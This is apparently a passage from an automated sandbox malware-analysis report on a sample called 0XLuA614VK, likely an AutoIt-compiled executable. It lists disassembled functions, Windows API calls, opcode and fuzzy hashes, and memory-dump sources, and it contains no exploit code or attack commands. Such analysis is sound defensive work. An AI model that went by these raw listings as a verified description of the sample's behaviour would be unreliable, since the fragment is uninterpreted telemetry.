                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap_free
                                                      • String ID:
                                                      • API String ID: 614378929-0
                                                      • Opcode ID: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                                      • Instruction ID: f136572af93f54b827410748478451c2842a5bda07bd49508ceb4a2ced94f2a6
                                                      • Opcode Fuzzy Hash: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                                      • Instruction Fuzzy Hash: 0C014E726047055BE331CF59DC45A5AFBECFB85371F25051DEA84932C0E6306809C774
                                                      Function 00F4E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
                                                      • Instruction ID: 0b8ec2d4a1c6c9e987b14229c96c0143848508e1a9bfd70e1dd8b31fdc2a5837
                                                      • Opcode Fuzzy Hash: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
                                                      • Instruction Fuzzy Hash: 0CF07D33920A1096D7313A79DC05B573B9CAF52331F110715FD24932C1CB7CD806BAA5
                                                      Function 00F29CB3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID:
                                                      • API String ID: 176396367-0
                                                      • Opcode ID: b69da61d860569f929b1c99c18b9dc9fd277deabbe59855a51152ec416ee2fb7
                                                      • Instruction ID: 113d01a34af7436988d9a70e855f50c5c0aade0350eca2cfdef07ba7523e0c10
                                                      • Opcode Fuzzy Hash: b69da61d860569f929b1c99c18b9dc9fd277deabbe59855a51152ec416ee2fb7
                                                      • Instruction Fuzzy Hash: 1FF028B36006016ED7109F28DC06B67BB94EF44770F10852AFA19CB2D1DB75E414A7A0
                                                      Function 00F54C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000008,00F21129,00000000,?,00F52E29,00000001,00000364,?,?,?,00F4F2DE,00F53863,00FF1444,?,00F3FDF5,?), ref: 00F54CBE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 2a26d6b87ced5a659e46fffc1d6d319dc4228fe66824b570d90d617d0a482b52
                                                      • Instruction ID: 019d7d8ce26194f866b39d6433fd280d3244fa01008c80d295136cacd56a56cf
                                                      • Opcode Fuzzy Hash: 2a26d6b87ced5a659e46fffc1d6d319dc4228fe66824b570d90d617d0a482b52
                                                      • Instruction Fuzzy Hash: C0F0E932A0223467DB215F629C0DB5B3B88BFC17BAB144111BE19F7281CA70F848B6F0
                                                      Function 00F53820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,?,00FF1444,?,00F3FDF5,?,?,00F2A976,00000010,00FF1440,00F213FC,?,00F213C6,?,00F21129), ref: 00F53852
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 5d03e9a025b6e7ecb50eb9bafea2b216be1a3f2332e7c0e77efa803a8d3ef4c6
                                                      • Instruction ID: 6b3b88908014bfe6bfd8cb2a6b2e308a0dd947e55f5dd0a75c9d0151378738e8
                                                      • Opcode Fuzzy Hash: 5d03e9a025b6e7ecb50eb9bafea2b216be1a3f2332e7c0e77efa803a8d3ef4c6
                                                      • Instruction Fuzzy Hash: 54E0E533900624A6D635266F9C00B9B3A48AF427F3F090121BE14A3581CB61EE09B1E0
                                                      Function 00F54D7A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00F54D9C
                                                        • Part of subcall function 00F529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000), ref: 00F529DE
                                                        • Part of subcall function 00F529C8: GetLastError.KERNEL32(00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000,00000000), ref: 00F529F0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorFreeHeapLast_free
                                                      • String ID:
                                                      • API String ID: 1353095263-0
                                                      • Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                      • Instruction ID: 230d0b17e569bcd11d12dbb3fe54816972e61f7bf55106c8748feeeb81d1212a
                                                      • Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                      • Instruction Fuzzy Hash: CCE06D361002059F8720CE6CD800A92B7F4EF853257208529ED9DD3711D331F856DB80
                                                      Function 00F24F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FreeLibrary.KERNEL32(?,?,00FF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F24F6D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: 617a7892c9105bbef723717e6b1b977281622eb74d6ac2d18a5f84b9837b16a4
                                                      • Instruction ID: 68dfd6755f9b7f1257a8fdb9815127c3929d6768f0f947dd5970b317f7adc004
                                                      • Opcode Fuzzy Hash: 617a7892c9105bbef723717e6b1b977281622eb74d6ac2d18a5f84b9837b16a4
                                                      • Instruction Fuzzy Hash: D2F03071505761CFDB349F64E590912BBE4FF54329310897EE5EA83511C7B1A844EF50
                                                      Function 00F22DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F22DC4
                                                        • Part of subcall function 00F26B57: _wcslen.LIBCMT ref: 00F26B6A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: LongNamePath_wcslen
                                                      • String ID:
                                                      • API String ID: 541455249-0
                                                      • Opcode ID: 5347ebe147d11c0808e61bbfae23a0bb4acc4715346fe995e5a5cb7c1de1fb39
                                                      • Instruction ID: 39c80f495e7875dddc76ea07a913724f66d63737c204be4cf35e3b604e98eb1c
                                                      • Opcode Fuzzy Hash: 5347ebe147d11c0808e61bbfae23a0bb4acc4715346fe995e5a5cb7c1de1fb39
                                                      • Instruction Fuzzy Hash: FDE0CD726001245BC72092589C05FDA77DDDFC8790F050171FD09D7248D964AD809590
                                                      Function 00F92693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock
                                                      • String ID:
                                                      • API String ID: 2638373210-0
                                                      • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                      • Instruction ID: b629f9cbafb7097a2ff44290b71ed19e676b2289d91a1ea3810ac46d895c5774
                                                      • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                      • Instruction Fuzzy Hash: 31E04FB0609B005FDF799E28A8517B677E89F4A310F00086EF69B82652E57268459A4D
                                                      Function 00F22B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F23837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F23908
                                                        • Part of subcall function 00F2D730: GetInputState.USER32 ref: 00F2D807
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00F22B6B
                                                        • Part of subcall function 00F230F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00F2314E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                      • String ID:
                                                      • API String ID: 3667716007-0
                                                      • Opcode ID: dcad359377a48eef9b38ddb17f0a0cf809cc2b3b4dfce5480f1fed43df9020c5
                                                      • Instruction ID: 05d2b3a5349225deddd9b3af15e40c0142b059b4af2d009eecdf0b41d01197dd
                                                      • Opcode Fuzzy Hash: dcad359377a48eef9b38ddb17f0a0cf809cc2b3b4dfce5480f1fed43df9020c5
                                                      • Instruction Fuzzy Hash: 1DE0266230422C02CA04FB34BC524BDB349EFD2311F84053EF14243163CE2C4545B2A1
                                                      Function 00F6039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,00F60704,?,?,00000000,?,00F60704,00000000,0000000C), ref: 00F603B7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 5671df99a47a9a5bb2eb8ed19d2bfa09b6d9f655e6da725e2d125c688130014e
                                                      • Instruction ID: 3b0fa7eaba43774650c55ffffa23dc0a2d161dc67636eb0b2ab30553845e96e6
                                                      • Opcode Fuzzy Hash: 5671df99a47a9a5bb2eb8ed19d2bfa09b6d9f655e6da725e2d125c688130014e
                                                      • Instruction Fuzzy Hash: E6D06C3214010DBBDF028F84DD46EDA3BAAFB48714F014100BE1866020C732E821AB90
                                                      Function 00F21CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00F21CBC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: InfoParametersSystem
                                                      • String ID:
                                                      • API String ID: 3098949447-0
                                                      • Opcode ID: a15f24c94591038db42154a89b43f8b0ac95154a6daeaa2066a37a8da8f74651
                                                      • Instruction ID: 5e982aab4f62ac04e6d8d39fd8e0f515c89d2d5e8ea755f460028cc65772f50f
                                                      • Opcode Fuzzy Hash: a15f24c94591038db42154a89b43f8b0ac95154a6daeaa2066a37a8da8f74651
                                                      • Instruction Fuzzy Hash: 59C09B3628030DDFF2144B80BC4AF217758B748F00F0C4001F609555E3C7A11410FA50
                                                      Function 00F3FC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction ID: 722fb28b5875da46d23c66e04d0b27772e8baa09f743dcea15ae73cddc879b1d
                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction Fuzzy Hash: 9F311275E0010A9BC718CF19D084A69FBA1FB49360F6492A5E80ACB616D731EEC4EBC0
                                                      Function 0116229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNELBASE(000001F4), ref: 011622B1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047674279.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1160000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                      • Instruction ID: c27871a870964bb75367f806710522e8f5d0f69529c2d75a17ab86bbfd2f00e0
                                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                      • Instruction Fuzzy Hash: 58E0BF7494010EEFDB00EFE4D5496DE7BB4EF04711F1005A5FD05D7681DB319E648A62
                                                      Function 011622A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNELBASE(000001F4), ref: 011622B1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047674279.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1160000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction ID: a150d8eab7a162c449b742568b8293618a94f4e9cd71a30bcf089f2daecde8b5
                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction Fuzzy Hash: 84E0BF7494010E9FDB00EFA4D54969E7BB4EF04701F100165FD0192281D73199608A62

                                                      Non-executed Functions

                                                      Function 00FB9576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F39BB2
                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00FB961A
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00FB965B
                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00FB969F
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00FB96C9
                                                      • SendMessageW.USER32 ref: 00FB96F2
                                                      • GetKeyState.USER32(00000011), ref: 00FB978B
                                                      • GetKeyState.USER32(00000009), ref: 00FB9798
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00FB97AE
                                                      • GetKeyState.USER32(00000010), ref: 00FB97B8
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00FB97E9
                                                      • SendMessageW.USER32 ref: 00FB9810
                                                      • SendMessageW.USER32(?,00001030,?,00FB7E95), ref: 00FB9918
                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00FB992E
                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00FB9941
                                                      • SetCapture.USER32(?), ref: 00FB994A
                                                      • ClientToScreen.USER32(?,?), ref: 00FB99AF
                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00FB99BC
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00FB99D6
                                                      • ReleaseCapture.USER32 ref: 00FB99E1
                                                      • GetCursorPos.USER32(?), ref: 00FB9A19
                                                      • ScreenToClient.USER32(?,?), ref: 00FB9A26
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00FB9A80
                                                      • SendMessageW.USER32 ref: 00FB9AAE
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00FB9AEB
                                                      • SendMessageW.USER32 ref: 00FB9B1A
                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00FB9B3B
                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00FB9B4A
                                                      • GetCursorPos.USER32(?), ref: 00FB9B68
                                                      • ScreenToClient.USER32(?,?), ref: 00FB9B75
                                                      • GetParent.USER32(?), ref: 00FB9B93
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00FB9BFA
                                                      • SendMessageW.USER32 ref: 00FB9C2B
                                                      • ClientToScreen.USER32(?,?), ref: 00FB9C84
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00FB9CB4
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00FB9CDE
                                                      • SendMessageW.USER32 ref: 00FB9D01
                                                      • ClientToScreen.USER32(?,?), ref: 00FB9D4E
                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00FB9D82
                                                        • Part of subcall function 00F39944: GetWindowLongW.USER32(?,000000EB), ref: 00F39952
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FB9E05
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                      • String ID: @GUI_DRAGID$F
                                                      • API String ID: 3429851547-4164748364
                                                      • Opcode ID: 02ee99fd7c0d6eae15ef6cd4438e6c82d3b9591c9ff77cc438c41b5c9c6b3415
                                                      • Instruction ID: 31988d05ca101e71924b532a5c91de9a0e6f4c24afc4a6b7104dd51e51e0d9a6
                                                      • Opcode Fuzzy Hash: 02ee99fd7c0d6eae15ef6cd4438e6c82d3b9591c9ff77cc438c41b5c9c6b3415
                                                      • Instruction Fuzzy Hash: DA429C31608245AFD724CF25CC84EEABBE6FF49320F144619F699872A1D7B1E850EF91
                                                      Function 00FB4873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00FB48F3
                                                      • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00FB4908
                                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00FB4927
                                                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00FB494B
                                                      • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00FB495C
                                                      • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00FB497B
                                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00FB49AE
                                                      • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00FB49D4
                                                      • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00FB4A0F
                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00FB4A56
                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00FB4A7E
                                                      • IsMenu.USER32(?), ref: 00FB4A97
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FB4AF2
